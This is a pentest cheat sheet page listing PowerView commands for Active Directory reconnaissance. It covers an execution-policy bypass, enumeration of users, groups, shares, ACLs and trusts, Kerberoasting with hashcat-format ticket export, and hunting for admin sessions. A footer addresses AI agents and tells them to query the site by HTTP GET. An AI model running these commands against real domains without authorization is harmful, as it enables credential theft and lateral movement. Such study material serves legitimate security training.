# powerview\.ps1

* [PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
* [PowerView Wiki](https://powersploit.readthedocs.io/en/latest/)

```bash
powershell.exe -exec bypass; Import-Module PowerView.ps1
[OR] . .\PowerView.ps1
```

## Domain information

```bash
Get-Domain [-Domain DOMAIN]
Get-DomainController [-Domain DOMAIN] 
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."to-enumerate-further"
```

## Domain Users & Computers

```bash
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
Get-DomainUser | select samaccountname,userprincipalname, memberof
Get-DomainUser * -Domain DOMAIN | Select-Object -Property name,samaccountname,description,memberof,admincount,userprincipalname, serviceprincipalname, useraccountcontrol
Get-UserProperty [-Properties FIELD]

Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
# live hosts
Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
```

### Kerberoastable Users

```bash
Get-NetUser -SPN | select serviceprincipalname
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
```

## Domain Groups

```bash
# can use *admin*
Get-NetGroup [-GroupName "GROUPNAME"]
Get-NetGroupMember [-GroupName "GROUPNAME"]
```

## SMB Shares

```bash
Invoke-ShareFinder [-CheckShareAccess]
```

## GPO

```bash
Get-NetGPO [| select displayname]
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
```

## ACLs

```bash
# Returns the ACLs associated with the specified account
Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs

#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs

#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
```

## Domain Trusts

```bash
Get-DomainTrust
Get-DomainTrust -Domain <DomainName>

#Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
Get-DomainTrustMapping
```

## User Hunting

```bash
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose

#Find local admins on all machines of the domain
Find-DomainLocalGroupMember -Verbose

#Find computers were a Domain Admin OR a spesified user has a session
Find-DomainUserLocation | Select-Object UserName, SessionFromName

#Confirming admin access
Test-AdminAccess
```

## References

* <https://hackersinterview.com/oscp/oscp-cheatsheet-powerview-commands>
* <https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/kashz-jewels/active-directory/powerview.ps1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.